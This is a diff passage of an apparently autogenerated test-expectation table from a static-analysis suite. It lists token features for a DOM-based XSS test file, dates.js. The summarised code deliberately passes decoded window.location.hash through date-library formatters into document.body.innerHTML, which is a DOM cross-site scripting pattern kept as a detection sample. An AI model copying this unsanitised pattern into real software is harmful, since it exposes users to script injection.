autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | exceptional return of DateTim ... 01-01") | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | exceptional return of DateTim ... 01-01") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | exceptional return of DateTim ... 01-01") | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | exceptional return of DateTim ... 01-01") | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:71 | exceptional return of DateTim ... 01-01") | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:79 | DateTim ... startOf | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:79 | DateTim ... startOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:79 | DateTim ... startOf | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:79 | DateTim ... startOf | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:79 | DateTim ... startOf | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | DateTim ... ('day') | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | DateTim ... ('day') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | DateTim ... ('day') | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | DateTim ... ('day') | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | DateTim ... ('day') | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | exceptional return of DateTim ... ('day') | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | exceptional return of DateTim ... ('day') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | exceptional return of DateTim ... ('day') | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | exceptional return of DateTim ... ('day') | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:86 | exceptional return of DateTim ... ('day') | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:95 | DateTim ... oFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:95 | DateTim ... oFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:95 | DateTim ... oFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:95 | DateTim ... oFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:95 | DateTim ... oFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | DateTim ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | exceptional return of DateTim ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | exceptional return of DateTim ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | exceptional return of DateTim ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | exceptional return of DateTim ... (taint) | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:42:50:102 | exceptional return of DateTim ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:51:50:57 | fromISO | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:51:50:57 | fromISO | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:51:50:57 | fromISO | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:51:50:57 | fromISO | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:51:50:57 | fromISO | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | CalleeFlexibleAccessPath | DateTime.fromISO | | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | calleeImports | luxon | @@ -13235,6 +98558,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:50:59:50:70 | "2020-01-01" | receiverName | DateTime | +| autogenerated/Xss/DomBasedXss/dates.js:50:73:50:79 | startOf | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:73:50:79 | startOf | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:73:50:79 | startOf | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:73:50:79 | startOf | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:73:50:79 | startOf | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | CalleeFlexibleAccessPath | DateTime.fromISO().startOf | | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | calleeImports | luxon | @@ -13243,6 +98571,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:50:81:50:85 | 'day' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:50:88:50:95 | toFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:50:88:50:95 | toFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:50:88:50:95 | toFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | +| autogenerated/Xss/DomBasedXss/dates.js:50:88:50:95 | toFormat | enclosingFunctionName | luxon | +| autogenerated/Xss/DomBasedXss/dates.js:50:88:50:95 | toFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | CalleeFlexibleAccessPath | DateTime.fromISO().startOf().toFormat | | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | calleeImports | luxon | @@ -13251,6 +98584,102 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 document body innerHTML Time is DateTime now plus years 1 toFormat taint document body innerHTML Time is DateTime setLocale fr toFormat taint document body innerHTML Time is DateTime fromISO 2020-01-01 startOf day toFormat taint | | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | enclosingFunctionName | luxon | | autogenerated/Xss/DomBasedXss/dates.js:50:97:50:101 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | DayJSAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | DayJSAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | DayJSAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | DayJSAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | DayJSAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | LuxonAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | LuxonAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | MomentAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | MomentAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | MomentAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | this | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | this | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | this | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:53:0 | this | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | 'arguments' object of function dateio2 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | 'arguments' object of function dateio2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | 'arguments' object of function dateio2 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | 'arguments' object of function dateio2 | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | 'arguments' object of function dateio2 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | exceptional return of function dateio2 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | exceptional return of function dateio2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | exceptional return of function dateio2 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | exceptional return of function dateio2 | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | exceptional return of function dateio2 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | functio ... OT OK\\n} | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | functio ... OT OK\\n} | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | return of function dateio2 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | return of function dateio2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | return of function dateio2 | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | return of function dateio2 | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:53:1:62:1 | return of function dateio2 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:53:10:53:16 | dateio2 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:53:10:53:16 | dateio2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:53:10:53:16 | dateio2 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:13 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:13 | taint | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:13 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:13 | taint | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:13 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint = ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint = ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint = ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint = ... ing(1)) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:9:54:69 | taint = ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:34 | decodeURIComponent | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:34 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:34 | decodeURIComponent | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:34 | decodeURIComponent | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:34 | decodeURIComponent | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | decodeU ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | decodeU ... ing(1)) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | exceptional return of decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | exceptional return of decodeU ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:17:54:69 | exceptional return of decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:41 | window | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:41 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:41 | window | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:41 | window | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:41 | window | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:50 | window.location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:50 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:50 | window.location | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:50 | window.location | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:50 | window.location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:55 | window.location.hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:55 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:55 | window.location.hash | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:55 | window.location.hash | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:55 | window.location.hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:65 | window. ... bstring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:65 | window. ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:54:36:54:65 | window. ... bstring | enclosingFunctionBody 